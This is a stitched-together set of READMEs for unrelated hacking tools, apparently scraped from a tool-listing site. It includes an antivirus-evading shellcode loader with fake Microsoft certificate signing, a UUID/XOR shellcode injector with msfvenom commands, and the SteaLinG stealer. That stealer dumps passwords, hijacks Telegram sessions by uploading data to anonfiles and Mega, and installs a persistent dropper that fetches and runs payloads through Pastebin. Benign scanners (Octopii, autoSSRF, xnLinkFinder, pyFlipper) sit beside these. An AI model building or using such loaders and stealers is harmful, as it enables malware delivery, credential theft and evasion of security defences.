- Payload padding with NOPs (\x90)

Requirements:
- A Windows machine w/ Visual Studio and the following components, which can be installed from Visual Studio Installer > Individual Components:
  - C++ Clang Compiler for Windows and C++ Clang-cl for build tools
  - ClickOnce Publishing
- Python3 and the required modules:
python3 -m pip install -r requirements.txt
(venv) PS C:\MalDev\laZzzy> python3 .\builder.py -h
[laZzzy ASCII-art banner]
by: CaptMeelo
usage: builder.py [-h] -s -p -m [-tp] [-sp] [-pp] [-b] [-d]
options:
-h, --help show this help message and exit
-s path to raw shellcode
-p password
-m shellcode execution method (e.g. 1)
-tp process to inject (e.g. svchost.exe)
-sp process to spawn (e.g. C:\\Windows\\System32\\RuntimeBroker.exe)
-pp parent process to spoof (e.g. explorer.exe)
-b binary to spoof metadata (e.g. C:\\Windows\\System32\\RuntimeBroker.exe)
-d domain to spoof (e.g. www.microsoft.com)
shellcode execution method:
1 Early-bird APC Queue (requires sacrificial process)
2 Thread Hijacking (requires sacrificial process)
3 KernelCallbackTable (requires sacrificial process that has GUI)
4 Section View Mapping
5 Thread Suspension
6 LineDDA Callback
7 EnumSystemGeoID Callback
8 FLS Callback
9 SetTimer
10 Clipboard
Execute builder.py and supply the necessary data.
(venv) PS C:\MalDev\laZzzy> python3 .\builder.py -s .\calc.bin -p CaptMeelo -m 1 -pp explorer.exe -sp C:\\Windows\\System32\\notepad.exe -d www.microsoft.com -b C:\\Windows\\System32\\mmc.exe
[laZzzy ASCII-art banner]
by: CaptMeelo
[+] XOR-encrypting payload with
[*] Key: d3b666606468293dfa21ce2ff25e86f6
[+] AES-encrypting payload with
[*] IV: f96312f17a1a9919c74b633c5f861fe5
[*] Key: 6c9656ed1bc50e1d5d4033479e742b4b8b2a9b2fc81fc081fc649e3fb4424fec
[+] Modifying template using
[*] Technique: Early-bird APC Queue
[*] Process to inject: None
[*] Process to spawn: C:\\Windows\\System32\\RuntimeBroker.exe
[*] Parent process to spoof: svchost.exe
[+] Spoofing metadata
[*] Binary: C:\\Windows\\System32\\RuntimeBroker.exe
[*] CompanyName: Microsoft Corporation
[*] FileDescription: Runtime Broker
[*] FileVersion: 10.0.22621.608 (WinBuild.160101.0800)
[*] InternalName: RuntimeBroker.exe
[*] LegalCopyright: ยฉ Microsoft Corporation. All rights reserved.
[*] OriginalFilename: RuntimeBroker.exe
[*] ProductName: Microsoftยฎ Windowsยฎ Operating System
[*] ProductVersion: 10.0.22621.608
[+] Compiling project
[*] Compiled executable: C:\MalDev\laZzzy\loader\x64\Release\laZzzy.exe
[+] Signing binary with spoofed cert
[*] Domain: www.microsoft.com
[*] Version: 2
[*] Serial: 33:00:59:f8:b6:da:86:89:70:6f:fa:1b:d9:00:00:00:59:f8:b6
[*] Subject: /C=US/ST=WA/L=Redmond/O=Microsoft Corporation/CN=www.microsoft.com
[*] Issuer: /C=US/O=Microsoft Corporation/CN=Microsoft Azure TLS Issuing CA 06
[*] Not Before: October 04 2022
[*] Not After: September 29 2023
[*] PFX file: C:\MalDev\laZzzy\output\www.microsoft.com.pfx
[+] All done!
[*] Output file: C:\MalDev\laZzzy\output\RuntimeBroker.exe
Octopii is an open-source AI-powered Personal Identifiable Information (PII) scanner that can look for image assets such as Government IDs, passports, photos and signatures in a directory.
Octopii uses Tesseract's Optical Character Recognition (OCR) and Keras' Convolutional Neural Networks (CNN) models to detect various forms of personal identifiable information that may be leaked on a publicly facing location. This is done in the following steps:
The image is imported via OpenCV and Python Imaging Library (PIL) and is cleaned, deskewed and rotated for scanning.
A directory is looped over and searched for images. These images are scanned for unique features via the image classifier (done by comparing it to a trained model), along with OCR for finding substrings within the image. This may have one of the following outcomes:
Best case (score >=90): The image is sent into the image classifier algorithm to be scanned for features such as an ISO/IEC 7810 card specification, colors, location of text, photos, holograms etc. If it is successfully classified as a type of PII, OCR is performed on it looking for particular words and strings as a final check. When both of these are confirmed, the result from Octopii is extremely reliable.
Average case (score >=50): The image is partially/incorrectly identified by the image classifier algorithm, but an OCR check finds contradicting substrings and reclassifies it.
Worst case (score >=0): The image is only identified by the image classifier algorithm but an OCR scan returns no results.
Incorrect classification: False positives due to a very small model or OCR list may incorrectly classify PIIs, giving inaccurate results.
As a final verification method, images are scanned for certain strings to verify the accuracy of the model.
The accuracy of the scan can be determined via the confidence scores in the output. If all the mentioned conditions are met, a score of 100.0 is returned.
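As a rough sketch of that final OCR keyword check (assuming pytesseract and Pillow are installed; the keyword lists and the scoring are illustrative, not Octopii's own):

```python
# Illustrative OCR keyword verification, in the spirit of Octopii's final check.
from PIL import Image
import pytesseract

KEYWORDS = {
    "passport": ["passport", "nationality"],
    "pan_card": ["income tax department", "permanent account number"],
}

def ocr_classify(path):
    text = pytesseract.image_to_string(Image.open(path)).lower()
    scores = {}
    for label, words in KEYWORDS.items():
        hits = sum(1 for w in words if w in text)
        if hits:
            scores[label] = 100.0 * hits / len(words)  # crude confidence score
    return scores

print(ocr_classify("samples/id_front.jpg"))
```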
To train the model, data can also be fed into the model_generator.py
script, and the newly improved h5 file can be used.
Install the dependencies with pip install -r requirements.txt.
Install Tesseract with sudo apt install tesseract-ocr -y (for Ubuntu/Debian).
Run python3 octopii.py <location name>, for example python3 octopii.py pii_list/
python3 octopii.py <location to scan> <additional flags>
Octopii currently supports local scanning and scanning S3 directories and open directory listings via their URLs.
Open-source projects like these thrive on community support. Since Octopii relies heavily on machine learning and optical character recognition, contributions are much appreciated. Here's how to contribute:
Fork the official repository at https://github.com/redhuntlabs/octopii
There are 3 files in the models/ directory:
- The keras_models.h5 file is the Keras h5 model that can be obtained from Google's Teachable Machine or via Keras in Python.
- The labels.txt file contains the list of labels corresponding to the index that the model returns.
- The ocr_list.json file consists of keywords to search for during an OCR scan, as well as other miscellaneous information such as country of origin, regular expressions etc.
Since our current dataset is quite small, we could benefit from a large Keras model of international PII for this project. If you do not have expertise in Keras, Google provides an extremely easy to use model generator called the Teachable Machine. To use it:
Tip: segregate your image assets into folders with the folder name being the same as the class name. You can then drag and drop a folder into the upload dialog.
Note: Only upload images matching the class name; for example, the German Passport class must have German Passport pictures. Uploading the wrong data to the wrong class will confuse the machine learning algorithms.
Move the downloaded keras_model.h5 file and labels.txt file into the models/ directory in Octopii.
The images used for the model above are not visible to us since they're in a proprietary format. You can use both dummy and actual PII. Make sure they are square-ish in image size.
Once you generate models using Teachable Machine, you can improve Octopii's accuracy via OCR. To do this:
- Open the ocr_list.json file. Create a JSONObject with the key having the same name as the asset class. NOTE: The key name must be exactly the same as the asset class name from Teachable Machine.
- Under keywords, use as many unique terms from your asset as possible, such as "Income Tax Department". Store them in a JSONArray.
- Save the ocr_list.json file.
You can replace each file you modify in the models/ directory after you create or edit them via the above methods.
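For illustration, a hypothetical ocr_list.json entry for a new class might look like the sketch below; the exact field names may differ, so check the existing ocr_list.json for the authoritative structure:

```python
# Hypothetical ocr_list.json entry (field names are assumptions, not Octopii's spec).
import json

entry = {
    "PAN Card": {  # must exactly match the Teachable Machine class name
        "keywords": ["income tax department", "permanent account number"],
        "country_of_origin": "IN",
        "regexes": ["[A-Z]{5}[0-9]{4}[A-Z]"],  # PAN number format
    }
}
print(json.dumps(entry, indent=2))
```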
Submit a pull request from your forked repo and we'll pick it up and replace our current model with it if the changes are large enough.
Note: Please take the appropriate steps to ensure quality, particularly when editing ocr_list.json.
(c) Copyright 2022 RedHunt Labs Private Limited
Author: Owais Shaikh
autoSSRF is your best ally for identifying SSRF vulnerabilities at scale. Different from other ssrf automation tools, this one comes with the two following original features :
Smart fuzzing on relevant SSRF GET parameters
When fuzzing, autoSSRF only focuses on the common parameters related to SSRF (?url=, ?uri=, ..) and doesn't interfere with everything else. This ensures that the original URL is still correctly understood by the tested web-application, something that might not happen with a tool which blindly sprays query parameters.
Context-based dynamic payloads generation
For the given URL https://host.com/?fileURL=https://authorizedhost.com, autoSSRF would recognize authorizedhost.com as a potentially white-listed host for the web-application, and generate payloads dynamically based on that, attempting to bypass the white-listing validation. This results in interesting payloads such as http://authorizedhost.attacker.com, http://authorizedhost%252F@attacker.com, etc.
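A minimal sketch of this context-based generation idea (not autoSSRF's actual payload list; attacker.com stands in for your interactsh callback domain):

```python
# Derive whitelist-bypass candidates from the host already present in a parameter.
from urllib.parse import urlparse, parse_qs

def gen_payloads(url, callback="attacker.com"):
    params = parse_qs(urlparse(url).query)
    payloads = []
    for name, values in params.items():
        host = urlparse(values[0]).hostname
        if not host:
            continue  # parameter value is not a URL
        payloads += [
            f"http://{host}.{callback}",        # whitelisted host as a subdomain of ours
            f"http://{host}%252F@{callback}",   # double-encoded slash + userinfo trick
        ]
    return payloads

for p in gen_payloads("https://host.com/?fileURL=https://authorizedhost.com"):
    print(p)
```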
Furthermore, this tool guarantees almost no false-positives. The detection relies on ProjectDiscovery's great interactsh, allowing autoSSRF to confidently identify out-of-band DNS/HTTP interactions.
python3 autossrf.py -h
This displays help for the tool.
usage: autossrf.py [-h] [--file FILE] [--url URL] [--output] [--verbose]
options:
-h, --help show this help message and exit
--file FILE, -f FILE file of all URLs to be tested against SSRF
--url URL, -u URL url to be tested against SSRF
--output, -o output file path
--verbose, -v activate verbose mode
Single URL target:
python3 autossrf.py -u https://www.host.com/?param1=X&param2=Y&param2=Z
Multiple URLs target with verbose:
python3 autossrf.py -f urls.txt -v
1 - Clone
git clone https://github.com/Th0h0/autossrf.git
2 - Install requirements
Python libraries :
cd autossrf
pip install -r requirements.txt
Interactsh-Client :
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
autoSSRF is distributed under MIT License.
This is a tool used to discover endpoints (and potential parameters) for a given target. It can find them by:
The python script is based on the link finding capabilities of my Burp extension GAP. As a starting point, I took the amazing tool LinkFinder by Gerben Javado, and used the Regex for finding links, but with additional improvements to find even more.
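To illustrate the general idea (this toy regex is mine and far less thorough than the Regex xnLinkFinder actually uses):

```python
# Toy regex-based link extraction in the spirit of LinkFinder/GAP.
import re

LINK_RE = re.compile(r"""["']((?:https?://|//|/)[^"'\s<>]{2,})["']""")

def extract_links(text):
    return sorted({m.group(1) for m in LINK_RE.finditer(text)})

js = 'fetch("/api/v1/users"); var cdn = "https://static.example.com/app.js";'
print(extract_links(js))  # ['/api/v1/users', 'https://static.example.com/app.js']
```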
xnLinkFinder supports Python 3.
$ git clone https://github.com/xnl-h4ck3r/xnLinkFinder.git
$ cd xnLinkFinder
$ sudo python setup.py install
Arg | Long Arg | Description |
---|---|---|
-i | --input | Input a: URL, text file of URLs, a Directory of files to search, a Burp XML output file or an OWASP ZAP output file. |
-o | --output | The file to save the Links output to, including path if necessary (default: output.txt). If set to cli then output is only written to STDOUT. If the file already exists it will just be appended to (and de-duplicated) unless option -ow is passed. |
-op | --output-params | The file to save the Potential Parameters output to, including path if necessary (default: parameters.txt). If set to cli then output is only written to STDOUT (but not piped to another program). If the file already exists it will just be appended to (and de-duplicated) unless option -ow is passed. |
-ow | --output-overwrite | If the output file already exists, it will be overwritten instead of being appended to. |
-sp | --scope-prefix | Any links found starting with / will be prefixed with scope domains in the output instead of the original link. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used. |
-spo | --scope-prefix-original | If argument -sp is passed, then this determines whether the original link starting with / is also included in the output (default: false) |
-sf | --scope-filter | Will filter output links to only include them if the domain of the link is in the scope specified. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used. |
-c | --cookies † | Add cookies to pass with HTTP requests. Pass in the format 'name1=value1; name2=value2;' |
-H | --headers † | Add custom headers to pass with HTTP requests. Pass in the format 'Header1: value1; Header2: value2;' |
-ra | --regex-after | RegEx for filtering purposes against found endpoints before output (e.g. /api/v[0-9]\.[0-9]\*). If it matches, the link is output. |
-d | --depth † | The level of depth to search. For example, if a value of 2 is passed, then all links initially found will then be searched for more links (default: 1). This option is ignored for Burp files because they can be huge and consume lots of memory. It is also advisable to use the -sp (--scope-prefix) argument to ensure a request to links found without a domain can be attempted. |
-p | --processes † | Basic multithreading is done when getting requests for a URL, or file of URLs (not a Burp file). This argument determines the number of processes (threads) used (default: 25) |
-x | --exclude | Additional Link exclusions (to the list in config.yml) in a comma separated list, e.g. careers,forum |
-orig | --origin | Whether you want the origin of the link to be in the output. Displayed as LINK-URL [ORIGIN-URL] in the output (default: false) |
-t | --timeout † | How many seconds to wait for the server to send data before giving up (default: 10 seconds) |
-inc | --include | Include input (-i) links in the output (default: false) |
-u | --user-agent † | What User Agents to get links for, e.g. -u desktop mobile |
-insecure | † | Whether TLS certificate checks should be disabled when making requests (default: false) |
-s429 | † | Stop when > 95 percent of responses return 429 Too Many Requests (default: false) |
-s403 | † | Stop when > 95 percent of responses return 403 Forbidden (default: false) |
-sTO | † | Stop when > 95 percent of requests time out (default: false) |
-sCE | † | Stop when > 95 percent of requests have connection errors (default: false) |
-m | --memory-threshold | The memory threshold percentage. If the machine's memory goes above the threshold, the program will be stopped and ended gracefully before running out of memory (default: 95) |
-mfs | --max-file-size † | The maximum file size (in bytes) of a file to be checked if -i is a directory. If the file size is over, it will be ignored (default: 500 MB). Setting to 0 means no files will be ignored, regardless of size. |
-replay-proxy | † | For active link finding with URL (or file of URLs), replay the requests through this proxy. |
-ascii-only | | Whether links and parameters will only be added if they only contain ASCII characters. This can be useful when you know the target is likely to use ASCII characters and you also get a number of false positives from binary files for some reason. |
-v | --verbose | Verbose output |
-vv | --vverbose | Increased verbose output |
-h | --help | show the help message and exit |

† NOT RELEVANT FOR INPUT OF DIRECTORY, BURP XML FILE OR OWASP ZAP FILE
The config.yml file has the keys which can be updated to suit your needs:
- linkExclude - A comma separated list of strings (e.g. .css,.jpg,.jpeg etc.) that all links are checked against. If a link includes any of the strings then it will be excluded from the output. If the input is a directory, then file names are checked against this list.
- contentExclude - A comma separated list of strings (e.g. text/css,image/jpeg,image/jpg etc.) that all responses' Content-Type headers are checked against. Any responses with these content types will be excluded and not checked for links.
- fileExtExclude - A comma separated list of strings (e.g. .zip,.gz,.tar etc.) that all files in Directory mode are checked against. If a file has one of those extensions it will not be searched for links.
- regexFiles - A list of file types separated by a pipe character (e.g. php|php3|php5 etc.). These are used in the Link Finding Regex when there are findings that aren't obvious links, but are interesting file types that you want to pick out. If you add to this list, ensure you escape any dots to ensure correct regex, e.g. js\.map
- respParamLinksFound † - Whether to get potential parameters from links found in responses: True or False
- respParamPathWords † - Whether to add path words in retrieved links as potential parameters: True or False
- respParamJSON † - If the MIME type of the response contains JSON, whether to add JSON Key values as potential parameters: True or False
- respParamJSVars † - Whether javascript variables set with var, let or const are added as potential parameters: True or False
- respParamXML † - If the MIME type of the response contains XML, whether to add XML attribute values as potential parameters: True or False
- respParamInputField † - If the MIME type of the response contains HTML, whether to add NAME and ID attributes of any INPUT fields as potential parameters: True or False
- respParamMetaName † - If the MIME type of the response contains HTML, whether to add NAME attributes of any META tags as potential parameters: True or False

† IF THESE ARE NOT FOUND IN THE CONFIG FILE THEY WILL DEFAULT TO True
python3 xnLinkFinder.py -i target.com
Ideally, provide a scope prefix (-sp) with the primary domain (including schema), and a scope filter (-sf) to filter the results only to relevant domains (this can be a file or in-scope domains). Also, you can pass cookies and custom headers to ensure you find links only available to authorised users. Specifying the User Agent (-u desktop mobile) will first search for all links using desktop User Agents, and then try again using mobile user agents. There could be specific endpoints that are related to the user agent given. Giving a depth value (-d) will keep sending requests to links found on the previous depth search to find more links.
python3 xnLinkFinder.py -i target.com -sp target_prefix.txt -sf target_scope.txt -spo -inc -vv -H 'Authorization: Bearer XXXXXXXXXXXXXX' -c 'SessionId=MYSESSIONID' -u desktop mobile -d 10
If you have a file of JS file URLs for example, you can look for links in those:
python3 xnLinkFinder.py -i target_js.txt
If you have files, e.g. JS files, HTTP responses, etc., you can look for links in those:
python3 xnLinkFinder.py -i ~/Tools/waymore/results/target.com
NOTE: Sub directories are also checked. The -mfs option can be specified to skip files over a certain size.
In Burp, select the items you want to search (by highlighting the scope, for example), right click and select Save selected items. Ensure that the base64-encode requests and responses option is checked before saving. To get all links from the file (even with HUGE files, you'll be able to get all the links):
python3 xnLinkFinder.py -i target_burp.xml
NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with -i starts with <?xml then you are trying to process a Burp file.
Ideally, provide a scope prefix (-sp) with the primary domain (including schema), and a scope filter (-sf) to filter the results only to relevant domains.
python3 xnLinkFinder.py -i target_burp.xml -o target_burp.txt -sp https://www.target.com -sf target.* -ow -spo -inc -vv
In ZAP, select the items you want to search (by highlighting the History, for example), click menu Report and select Export Messages to File.... This will let you save an ASCII text file of all requests and responses you want to search. To get all links from the file (even with HUGE files, you'll be able to get all the links):
python3 xnLinkFinder.py -i target_zap.txt
NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with -i is in the format ==== 99 ========== for example, then you are trying to process an OWASP ZAP ASCII text file.
You can pipe xnLinkFinder to other tools. Any errors are sent to stderr and any links found are sent to stdout. The output file is still created in addition to the links being piped to the next program. However, potential parameters are not piped to the next program, but they are still written to file. For example:
python3 xnLinkFinder.py -i redbull.com -sp https://redbull.com -sf redbull.* -d 3 | unfurl keys | sort -u
You can also pass the input through stdin instead of -i.
cat redbull_subs.txt | python3 xnLinkFinder.py -sp https://redbull.com -sf redbull.* -d 3
NOTE: You can't pipe in a Burp or ZAP file; these must be passed using -i.
- Always provide a scope prefix with -sp. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no path should be included, and no wildcards used; schema is optional, but will default to http):
http://www.target.com
https://target-payments.com
https://static.target-cdn.com
If a link is found that starts with /, e.g. /path/to/example.js, then passing -sp http://www.target.com will result in the output http://www.target.com/path/to/example.js, and if Depth (-d) is >1 then a request will be able to be made to that URL to search for more links. If a file of domains is passed using -sp then the output will include each domain followed by /path/to/example.js and increase the chance of finding more links.
- If you use -sp but still want the original link of /path/to/example.js (without a domain) additionally returned in the output, then pass the argument -spo.
- Always provide a scope filter with -sf. This will ensure that only relevant domains are returned in the output, and more importantly, if Depth (-d) is >1 then out-of-scope targets will not be searched for links or parameters. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no schema or path should be included):
target.*
target-payments.com
static.target-cdn.com
- Filter the output with -ra. It's always a good idea to use https://regex101.com/ to check your Regex expression is going to do what you expect.
- Use the -v option to have a better idea of what the tool is doing.
- Use the -vv option to see errors that are occurring, which can possibly be resolved, or which you can raise as an issue on github.
- Pass cookies (-c), headers (-H) and regex (-ra) values within single quotes, e.g. -ra '/api/v[0-9]\.[0-9]\*'
- Use the -o option to give a specific output file name for Links, rather than the default of output.txt. If you plan on running a large depth of searches, start with 2 with option -v to check what is being returned. Then you can increase the Depth, and the new output will be appended to the existing file, unless you pass -ow.
- Use the -op option to give a specific output file name for Potential Parameters, rather than the default of parameters.txt. Any output will be appended to the existing file, unless you pass -ow.
- When using a high level of Depth (-d), be wary of some sites using dynamic links, so it will just keep finding new ones. If no new links are being found, then xnLinkFinder will stop searching. Providing the Stop flags (s429, s403, sTO, sCE) should also be considered.
- If you are finding a large number of links (especially if the -d value is high) and have limited resources, the program will stop when it reaches the memory threshold (-m) value and end gracefully with data intact before getting killed.
- If you decide to cancel xnLinkFinder (using Ctrl-C) in the middle of running, be patient and any gathered data will be saved before ending gracefully.
- Using the -orig option will show the URL where the link was found. This can mean you have duplicate links in the output if the same link was found on multiple sources, but each will be suffixed with the origin URL in square brackets.
- When using the -u/--user-agent argument, the default is desktop. If you have a target that could have different links for different user agent groups, then specify -u desktop mobile for example (separate with a space). The mobile user agent option is a combination of mobile-apple, mobile-android and mobile-windows.
- When the input -i has been set to a directory, the contents of the files in the root of that directory will be searched for links. Files in sub-directories are not searched. Any files that are over the size set by -mfs (default: 500 MB) will be skipped.
- If you use the -replay-proxy option, sometimes requests can take longer. If you start seeing more Request Timeout errors (you'll see errors if you use the -v or -vv options) then consider using -t to raise the timeout limit.
- If you know a target will only have ASCII characters in links and parameters, then consider passing -ascii-only. This can eliminate a number of false positives that can sometimes get returned from binary data.
If you come across any problems at all, or have ideas for improvements, please feel free to raise an issue on Github. If there is a problem, it will be useful if you can provide the exact command you ran and a detailed description of the problem. If possible, run with -vv to reproduce the problem and let me know about any error messages that are given.
Active link finding for a domain:
Piped input and output:
Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE! ☕ (I could use the caffeine!)
Another shellcode injection technique using C++ that attempts to bypass Windows Defender using XOR encryption sorcery and UUID strings madness :).
Firstly, generate a payload in binary format (using either CobaltStrike or msfvenom). For instance, in msfvenom, you can do it like so (the payload I'm using is for illustration purposes; you can use whatever payload you want):
msfvenom -p windows/messagebox -f raw -o shellcode.bin
Then convert the shellcode (in binary/raw format) into a UUID string format using the Python3 script bin_to_uuid.py:
./bin_to_uuid.py -p shellcode.bin > uuid.txt
XOR-encrypt the UUID strings in uuid.txt using the Python3 script xor_encryptor.py:
./xor_encryptor.py uuid.txt > xor_crypted_out.txt
Copy the C-style array in the file xor_crypted_out.txt and paste it in the C++ file as an array of unsigned char, i.e. unsigned char payload[]{your_output_from_xor_crypted_out.txt}
This shellcode injection technique comprises the following subsequent steps:
1. Allocates a chunk of memory with VirtualAlloc
2. XOR-decrypts the payload using the XOR key value
3. Uses UuidFromStringA to convert the UUID strings into their binary representation and store them in the previously allocated memory. This is used to avoid the usage of suspicious APIs like WriteProcessMemory or memcpy.
4. Uses EnumChildWindows to execute the payload previously loaded into memory (in step 1)

Instead of using memcpy or WriteProcessMemory, which are known to raise alarms to AVs/EDRs, this program uses the Windows API function called UuidFromStringA, which can be used to decode data as well as write it to memory (Isn't that great folks? And please don't say "NO!" :) ).

To customize:
- Change the XOR key (row 86) to what you wish. This can be done in the ./xor_encryptor.py python3 script by changing the KEY variable.
- Change the executable filename value (row 90) to your filename.
- To compile, mingw was used, but you can use whichever compiler you prefer. :)
make
The binary was scanned using antiscan.me on 01/08/2022.
https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/
The SteaLinG is an open-source penetration testing framework designed for social engineering. After the hack, you can upload it to the victim's device and run it.
This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes
module | Short description |
---|---|
Dump password | Steal all saved passwords, upload the saved-passwords file to Mega |
Dump History | dump browser history |
dump files | Steal files from the hard drive with the extension you want |
module | Short description |
---|---|
1-Telegram Session Hijack | Telegram session hijacker |
Telegram sessions are stored in C:\Users\<pc name>\AppData\Roaming\Telegram Desktop, in the 'tdata' folder:
C:
└── Users
    └── AppData
        └── Roaming
            └── TelegramDesktop
                └── tdata
Once you have moved this folder, with all its contents, to the same path on your own device, the session is hijacked; it is that simple. The tool does all of this for you; all you have to do is give it your token from the site https://anonfiles.com/
The first step is to go to the path where the tdata folder is located and convert it to a zip file. If Telegram is running this would fail, so on any error the tool kills the Telegram processes first; killing processes directly can look like malicious behavior to antivirus, so this part is handled with try/except in the code. The name of the archive file is taken from the name of the victim's device, in case you have more than one victim. After that, the tool makes a POST request with the zip file to the anonfiles website using the API key (token) of your account on the site. Just that, and it is not flagged by any AV.
module |
---|
2- Dropper |
The dropper asks for the URL of the virus (or whatever you want to download to the victim's device); keep in mind that the URL must be direct, meaning it must end with the file itself (.exe, .png, etc.). The second thing it asks for is your Pastebin API key: register on the site, click on API, and you will find it along with your username and password. So how does it work?
First, it creates a private paste on the site containing the URL you gave it, and then it gives you an exe file. When that exe runs on any device, it adds itself to the device's registry in two different ways, opens Pastebin, reads the private paste you created, takes the URL in it, downloads its content and runs it. You can change the URL in the paste at any time; the dropper checks the URL every 10 minutes, and if it has changed it downloads and runs the new content, so without doing anything else you can effectively reach the device from anywhere.
3- Linux support
4- You can now choose between Mega or Pastebin
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
pip install -r requirements.txt
python SteaLinG.py
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
chmod +x linux_setup.sh
bash linux_setup.sh
python SteaLinG.py
* Don't upload it to VirusTotal.com, because this tool will stop working with time.
* VirusTotal shares signatures with AV companies.
* Again, don't be an idiot!
Unofficial Flipper Zero CLI wrapper written in Python
$ git clone https://github.com/wh00hw/pyFlipper.git
$ cd pyFlipper
$ python3 -m venv venv
$ source venv/bin/activate
$ pip install -r requirements.txt
from pyflipper import PyFlipper
#Local serial port
flipper = PyFlipper(com="/dev/ttyACM0")
#OR
#Remote serial2websocket server
flipper = PyFlipper(ws="ws://192.168.1.5:1337")
#Info
info = flipper.power.info()
#Poweroff
flipper.power.off()
#Reboot
flipper.power.reboot()
#Reboot in DFU mode
flipper.power.reboot2dfu()
#Install update from .fuf file
flipper.update.install(fuf_file="/ext/update.fuf")
#Backup Flipper to .tar file
flipper.update.backup(dest_tar_file="/ext/backup.tar")
#Restore Flipper from backup .tar file
flipper.update.restore(bak_tar_file="/ext/backup.tar")
#List installed apps
apps = flipper.loader.list()
#Open app
flipper.loader.open(app_name="Clock")
#Get flipper date
date = flipper.date.date()
#Get flipper timestamp
timestamp = flipper.date.timestamp()
#Get the processes dict list
ps = flipper.ps.list()
#Get device info dict
device_info = flipper.device_info.info()
#Get heap info dict
heap = flipper.free.info()
#Get free_blocks string
free_blocks = flipper.free.blocks()
#Get bluetooth info
bt_info = flipper.bt.info()
#Get the storage filesystem info
ext_info = flipper.storage.info(fs="/ext")
#Get the storage /ext dict
ext_list = flipper.storage.list(path="/ext")
#Get the storage /ext tree dict
ext_tree = flipper.storage.tree(path="/ext")
#Get file info
file_info = flipper.storage.stat(file="/ext/foo/bar.txt")
#Make directory
flipper.storage.mkdir(new_dir="/ext/foo")
#Read file
plain_text = flipper.storage.read(file="/ext/foo/bar.txt")
#Remove file
flipper.storage.remove(file="/ext/foo/bar.txt")
#Copy file
flipper.storage.copy(src="/ext/foo/source.txt", dest="/ext/bar/destination.txt")
#Rename file
flipper.storage.rename(file="/ext/foo/bar.txt", new_file="/ext/foo/rab.txt")
#MD5 Hash file
md5_hash = flipper.storage.md5(file="/ext/foo/bar.txt")
#Write file in one chunk
file = "/ext/bar.txt"
text = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""
flipper.storage.write.file(file, text)
#Write file using a listener
import time

file = "/ext/foo.txt"
text_one = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""
flipper.storage.write.start(file)
time.sleep(2)
flipper.storage.write.send(text_one)
text_two = """All the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as
necessary, making this the first true generator on the Internet.
It uses a dictionary of over 200 Latin words, combined with a handful of
model sentence structures, to generate Lorem Ipsum which looks reasonable.
The generated Lorem Ipsum is therefore always free from repetition, injected humour, or non-characteristic words etc.
"""
flipper.storage.write.send(text_two)
time.sleep(3)
#Don't forget to stop
flipper.storage.write.stop()
#Set generic led on (r,b,g,bl)
flipper.led.set(led='r', value=255)
#Set blue led off
flipper.led.blue(value=0)
#Set green led value
flipper.led.green(value=175)
#Set backlight on
flipper.led.backlight_on()
#Set backlight off
flipper.led.backlight_off()
#Turn off led
flipper.led.off()
#Set vibro True or False
flipper.vibro.set(True)
#Set vibro on
flipper.vibro.on()
#Set vibro off
flipper.vibro.off()
#Set gpio mode: 0 - input, 1 - output
flipper.gpio.mode(pin_name=PIN_NAME, value=1)
#Read gpio pin value
flipper.gpio.read(pin_name=PIN_NAME)
#Set gpio pin value
flipper.gpio.set(pin_name=PIN_NAME, value=1)
#Play song in RTTTL format
rttl_song = "Littleroot Town - Pokemon:d=4,o=5,b=100:8c5,8f5,8g5,4a5,8p,8g5,8a5,8g5,8a5,8a#5,8p,4c6,8d6,8a5,8g5,8a5,8c#6,4d6,4e6,4d6,8a5,8g5,8f5,8e5,8f5,8a5,4d6,8d5,8e5,2f5,8c6,8a#5,8a#5,8a5,2f5,8d6,8a5,8a5,8g5,2f5,8p,8f5,8d5,8f5,8e5,4e5,8f5,8g5"
#Play in loop
flipper.music_player.play(rtttl_code=rttl_song)
#Stop loop
flipper.music_player.stop()
#Play for 20 seconds
flipper.music_player.play(rtttl_code=rttl_song, duration=20)
#Beep
flipper.music_player.beep()
#Beep for 5 seconds
flipper.music_player.beep(duration=5)
#Synchronous default timeout 5 seconds
#Detect NFC
nfc_detected = flipper.nfc.detect()
#Emulate NFC
flipper.nfc.emulate()
#Activate field
flipper.nfc.field()
#Synchronous default timeout 5 seconds
#Read RFID
rfid = flipper.rfid.read()
#Transmit hex_key N times(default count = 10)
flipper.subghz.tx(hex_key="DEADBEEF", frequency=433920000, count=5)
#Decode raw .sub file
decoded = flipper.subghz.decode_raw(sub_file="/ext/subghz/foo.sub")
#Transmit hex_address and hex_command selecting a protocol
flipper.ir.tx(protocol="Samsung32", hex_address="C000FFEE", hex_command="DEADBEEF")
#Raw Transmit samples
flipper.ir.tx_raw(frequency=38000, duty_cycle=0.33, samples=[1337, 8888, 3000, 5555])
#Synchronous default timeout 5 seconds
#Receive tx
r = flipper.ir.rx(timeout=10)
#Read (default timeout 5 seconds)
ikey = flipper.ikey.read()
#Write (default timeout 5 seconds)
ikey = flipper.ikey.write(key_type="Dallas", key_data="DEADBEEFC000FFEE")
#Emulate (default timeout 5 seconds)
flipper.ikey.emulate(key_type="Dallas", key_data="DEADBEEFC000FFEE")
#Attach event logger (default timeout 10 seconds)
logs = flipper.log.attach()
#Activate debug mode
flipper.debug.on()
#Deactivate debug mode
flipper.debug.off()
#Search
response = flipper.onewire.search()
#Get
response = flipper.i2c.get()
#Input dump
dump = flipper.input.dump()
#Send input
flipper.input.send("up", "press")
Feel free to contribute in any way
